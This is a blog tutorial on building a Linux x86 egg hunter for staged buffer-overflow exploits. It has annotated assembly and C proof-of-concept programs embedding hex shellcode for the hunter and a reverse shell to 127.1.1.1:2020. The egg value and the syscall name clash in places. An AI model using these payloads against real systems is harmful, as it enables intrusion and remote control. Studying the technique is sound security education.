• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to secondary sidebar
OpenTechTips

OpenTechTips

Comprehensive IT Guides for Pros and Enthusiasts

MENUMENU
  • HOME
  • ALL TOPICS
    • Exchange
    • InfoSec
    • Linux
    • Networking
    • Scripting
      • PowerShell
    • SSL
    • Tools
    • Virtualization
    • Web
    • Windows
  • ABOUT
  • SUBSCRIBE
Home » Linux Egg Hunter – x86

Linux Egg Hunter – x86

March 24, 2020 - by Zsolt Agoston - last edited on April 18, 2020

Another interesting topic. First of all, what is an egghunter?

You will encounter a scenario sooner or later when you can use a buffer overflow condition to execute your code on a target, but the memory space for that is so limited, you simply can’t inject any usuable payload there. What if you could execute your code in two stages? What if you first injected a very short code, that would jump to another memory location where there your final payload lives because you could find enough space for it there?

This is what the little egghunter code does: it runs through the memory, looking for the “egg”, which is a unique 4byte string in the memory, which marks the beginning of our larger payload.  When it’s found, the control is passed over to it.

OK, sound easy, but there is a problem. In a linux environment, especially with ASLR (address space layout randimization – where the OS is randomizing the memory location where the executables are loaded) in the picture there are random spaces in the memory that are not accessible by our executable. Trying to access it will result a segmentation fault error, that we need to avoid, so our memory scanner needs to test it first if the space is accessible or not. Once it’s sorted, we can go for reading each double word and compare them with the EGG, our pre-defined 4byte string, that marks the beginning of the payload which then can be run easily.

Here let’s check out the whole code for that, and analyze it a little

; Title: Linux/x86 Egg Hunter code – 36 bytes

 global _startsection .text
 
_start:
xor edx, edx         ;clear out edx
 
next4k:
    or dx, 0xfff         ;put 4095 in the counter, next inc will complete 4k
 
eggfind:
    inc edx              ;PAGE_SIZE=4096
    xor ecx, ecx
    mov ebx, edx         ;page address into ebx
 
    push 0x21            ;int access(const char *pathname, int mode)
    pop eax
 
    int 0x80
 
    cmp al,0xf2          ;if page is non-accessible (eax=0xfffffff2 or -14), then try next page
    je next4k
 
    mov edi,edx          ;prepare compare edi-eax
    mov eax,0xf89090f9   ;egg
 
    scasd                ;compare eax and edi, increases edi
    jne eggfind
    scasd                ;compare eax and [edi+4]
    jne eggfind

    jmp edi              ;execute shellcode 

Here is our simple memory scanner egghunter program. As we said ealier the first thing we need to do is to find the memory space we are allowed to use, that won’t give us an EFAULT – defined by /usr/include/asm/errno.h, error #14 , check it out – result, to do that we use the access() kernel function. As you surely remember from the earlier posts (Bind Shell, Reverse Shell – if not, please check them out) to invoke a kernel function we need to use interrupt 0x80 in linux-world. Doing that the kernel will check the $eax, $ebx, $ecx, …and so on registers and the stack for arguments. In $eax we put the appropriate syscall number that we can find in the /usr/include/i386-linux-gnu/asm/unistd_32.h header file:

Linux Egg Hunter – x86

Decimal 33, in hex it’s 0x21, so $eax=0x21. Let’s see the manual what arguments does access() need?

int access(const char *pathname, int mode);

Ok, so $ebx needs to contain the address, great; the mode describes what tests we want to run, in our case it’s absolutely not important, as long as the result is not EFAULT, we are good, so we set $ecx=0.

OK, so see how our code starts:

    xor edx, edx         ;clear out edx
 
next4k:
    or dx, 0xfff         ;put 4095 in the counter, next inc will complete 4k
 
eggfind:
    inc edx              ;PAGE_SIZE=4096
    xor ecx, ecx
    mov ebx, edx         ;page address into ebx
 
    push 0x21            ;int access(const char *pathname, int mode)
    pop eax
 
    int 0x80

First we zero out $edx, usually the time when the control is passed over to the egghunter the registers contain garbage values and we will use $edx as the memory address counter, so we need to make sure it has a zero value before our egghunter program runs.

The next part seems strange but it is actually very simple.

Let’s talk about memory a little:

On a 32bit architecture the operating system has 32bits to store memory addresses, not a bit more. That means 232 (roughly 4.2 billion values, in the memory they refer to individual bytes, that makes exactly 4GB addressable space). OK, we have 4GB memory to use. How is that space looks like, how is it divided? Take a look at the diagram below:

Linux Egg Hunter – x86

One of the good thing that the linux kernel does is that it doesn’t expect us (or the processes) to know the absolute addresses they use in memory, it maps a virtual addresses for each process that runs, so they see the same addresses and can rely on them. For instance all programs start at virtual memory address of 0x08048000, as a linux convention, the space between the start of the memory (0x0) and this address is unusable, we MUST avoid trying to access it, otherwise we receive a segmentation error fault we we don’t want. The our process loads itself in the lower memory range and uses happily the next large memory chunk which can grow all the up to 3GBs (there is the well known stack on the top of the range, growing famously down, streching 8MB by default. It’s number depends on the allowed number of threads that can run simultaneously. In between there’s the heap, a share memory space for processes that they can use freely while they run). The highest 1GB of memory is reserved by the linux kernel and not accessible for us.

OK, so in one word we need to avoid using the lowest virtual memory range that is stretching from 0x0 to 0x08048000, then we can scan the memory, till we find our injected egg somewhere.

So back to our code, we do a little trick here, to save instuctions we don’t put 0x08048000 in $edx (which is the goal here), we start to scan from 0x0 and check if the memory segment is accessible or not. If it is, that means we reaches 0x08048000 and we go on with our loop checking the actual bytes in the memory. Also, you might ask if we should jump 4 bytes at a time (double-word size) which is a prefectly valid question, but again, to keep our egghunter code as small as possible we sacrifice speed for space, using “inc edx” is a byte (\x42), while “add edx, 0x4” is 3 bytes (\x83\xC2\x04). So first, we need to increment $edx by 4096byte chunks, until we find the accessible memory part. Why 4Kbytes? Issuing the “getconf PAGE_SIZE” command in the shell, we get the value 4096 back. By default linux divides memory to blocks that will help it map physical memory to the virtual memory allocated to the processes as we mentioned earlier. These blocks are called PAGES and the virtual memory builds up from these blocks.

We could increment the counter by one but that would make our code run very slow, so instead we  put multiples of 4096 as an argument of access(), as the size of the blocks the kernel uses. To achieve that we simply put 0x0fff in the $edx register by adjusting the last 12bits (0xfff) to be 1, which is 4095 in decimal, and with the next command in the “eggfind” loop we simply increase it by one, the result technically is a 4096 increment each time the “next4k” loop runs. Only one byte extra for incrementing by 4096, incrementing the execution speed dramatically!

Reading the code further down  we zero out $ecx (as second argument of access() ), and move $edx (the memory counter) to $ebx which is – remember – the first argument of access().

Then we put 0x21 (syscall value) in $eax using the push-pop method, and we go for the syscall. The result will come in $eax, which we check, if it is 0xfffffff2 (EFAULT) that means the memory segment is not accessible, we jump to “next4k” to add 4096 to our memory value-counter, and do the whole thing again, until the result is positive and we can go on checking the memory space.

 eggfind:
 inc edx              ;PAGE_SIZE=4096
 xor ecx, ecx
 mov ebx, edx         ;page address into ebx
 
 push 0x21            ;int access(const char *pathname, int mode)
 pop eax
 
 int 0x80
 
 mov edi,edx          ;prepare compare edi-eax
 mov eax,0xf89090f9   ;egg

 scasd                ;compare eax and edi, increases edi
 jne eggfind
 scasd                ;compare eax and [edi+4]
 jne eggfind 

From this point the “eggfind” loop is running, there’s no need to jump 4096 bytes now, we increase the counter by one at a time, then at each memory location we move the value to $edi, and the egg value to $eax. Ideally we could incease it by 4 each time (double-word size) to make the program faster, but using one increment keeps our shellcode smaller, that is the highest priority now. The egg value here is 0x78787878, which is the ascii values of the “xxxx” string. You can use your own doubleword here. The SCASD instruction compares the memory location at [edi] and the egg in $eax and sets the ZF (zero flag) if they match. If they do, the same comparison happens with the next 4 byte memory chunk (yes, there are two eggs in front of the large shellcode, we’ll see why), if they also match, the code execution jumps to the memory after the eggs and the large shellcode will be run.

To test the concept we put together a small C program, using the egghunter that will find the large shellcode in the memory

/*
 Title: Linux/x86 Egg Hunter code - POC

 */

 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>

 #define EGG "\x78\x78\x78\x78"        // the EGG, here: "xxxx"

 char egghunter[50] = \
 "\x31\xd2\x66\x81\xca\xff\x0f\x42\x31\xc9\x89\xd3\x6a\x21\x58\xcd"
 "\x80\x3c\xf2\x74\xed\x89\xd7\xb8” EGG “\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";

 // start with the double-egg to be found by egghunter()
 // then a reverse shell to 127.1.1.1:2020 is executed
 char shellcode[100] = \
 EGG EGG "\x6a\x66\x58\x31\xd2\x52\x42\x52\x89\xd3\x42\x52\x89\xe1"
 "\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
 "\x7f\x01\x01\x01\x66\x68\x07\xe4\x66\x53\x89\xe1\xb0\x66\x43\x6a"
 "\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x89\xd1\x52\x68\x6e\x2f"
 "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xcd\x80";

 int main()
 {
 printf("Egghunter: %d bytes\n", strlen(egghunter));
 printf("Shellcode address in memory: %p\n", shellcode);
 printf("Shellcode: %d bytes\n", strlen(shellcode)-8);     //substract the double-egg size

 int (*ret)() = (int(*)())egghunter; 
 ret();
 }

Let’s see, what happens exactly when we run the code. We compile the program and load it in GDB:

gcc -ggdb -fno-stack-protector -z execstack egg.c -o egg

First we place a breakpoint at the beginning of the egghunter code. We see immediately that zeroing $edx and $ecx was necessary, they contain garbage values the point the code starts to be executed.

Linux Egg Hunter &#8211; x86

Now see the accept() loop, that is checking the beginning of each 4k block of memory. We place a breakpoint just after the jne conditional jump (at 0x0804a055), the loop will end when it finds an accessible memory segment

Linux Egg Hunter &#8211; x86

The first accessible is at 0x804800, what a surprise, the start of the program Linux Egg Hunter &#8211; x86!

Linux Egg Hunter &#8211; x86

Now see how it finds the egg, and why we needed to place the egg twice in the front of the shellcode.

We place the breakpoint at 0x0804a060, before the second conditional check would happen (third if we see it from the  the accept() funtion’s point of view). Running through the memory, the program quickly finds the egg at *0x804a058. But hold on! We started to scan the memory starting with the actual program code, will it find the egg in our egghunt code when it checks the egg against the memory contents? Indeed, that what’s happened! The code will countinue and is looking for another instance of the egg, which is not present here of course, only the large payload will have two consecutive egges in from of it, if will go on scanning the memory further.

Linux Egg Hunter &#8211; x86

Now the code seems to found the egg second time in the memory! Examining the memory segment there shows that we have the egg twice there, and the following code matches the shellcode! Bingo! The little egghunter program found the shellcode, the next command will jump to the code itself and execute it!

Linux Egg Hunter &#8211; x86

See below, compare our shellcode[] with the gdb output above. After the two EGGs we have “\x6a\x66\x58\x31” indeed, the asm code will jum to that memory part executing our reverse shell!:

See it in practice. Wee split our terminal with tmux to make it easier to follow:

Linux Egg Hunter &#8211; x86

Now check if the egghunter works if the shellcode is in higher memory spaces? Declaring the shellcode in the main() function puts it to the higher memory area, allocating a memory space randomly each time the process runs, the reverse shell is executed each time as expected Linux Egg Hunter &#8211; x86

 /*
 Title: Linux/x86 Egg Hunter code – POC – random memory

 */ 

 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>

 #define EGG "\x78\x78\x78\x78"  // the EGG, here: "xxxx"

 char egghunter[50] = \
 "\x31\xd2\x66\x81\xca\xff\x0f\x42\x31\xc9\x89\xd3\x6a\x21\x58\xcd"
 "\x80\x3c\xf2\x74\xed\x89\xd7\xb8” EGG “\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";

 int main()
 {
 // start with the double-egg to be found by egghunter()
 // then a reverse shell to 127.1.1.1:2020 is executed

 char shellcode[100] = \
 EGG EGG "\x6a\x66\x58\x31\xd2\x52\x42\x52\x89\xd3\x42\x52\x89\xe1"
 "\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
 "\x7f\x01\x01\x01\x66\x68\x07\xe4\x66\x53\x89\xe1\xb0\x66\x43\x6a"
 "\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x89\xd1\x52\x68\x6e\x2f"
 "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xcd\x80";

 printf("Egghunter: %d bytes\n", strlen(egghunter));
 printf("Shellcode: %d bytes\n", strlen(shellcode)-8);   //substract the double-egg size

 int (*ret)() = (int(*)())egghunter; 
 ret();
 }
Linux Egg Hunter &#8211; x86

Reader Interactions

Comments Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Tools

Secondary Sidebar

  • Terms of Use
  • Disclaimer
  • Privacy Policy
Manage your privacy

To provide the best experiences, we and our partners use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us and our partners to process personal data such as browsing behavior or unique IDs on this site and show (non-) personalized ads. Not consenting or withdrawing consent, may adversely affect certain features and functions.

Click below to consent to the above or make granular choices. Your choices will be applied to this site only. You can change your settings at any time, including withdrawing your consent, by using the toggles on the Cookie Policy, or by clicking on the manage consent button at the bottom of the screen.

Functional Always active
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
Preferences
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Statistics
The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Marketing
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.
Statistics

Marketing

Features
Always active

Always active
Manage options Manage services Manage {vendor_count} vendors Read more about these purposes
Manage options
{title} {title} {title}
Manage your privacy
To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.
Functional Always active
The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.
Preferences
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Statistics
The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
Marketing
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.
Statistics

Marketing

Features
Always active

Always active
Manage options Manage services Manage {vendor_count} vendors Read more about these purposes
Manage options
{title} {title} {title}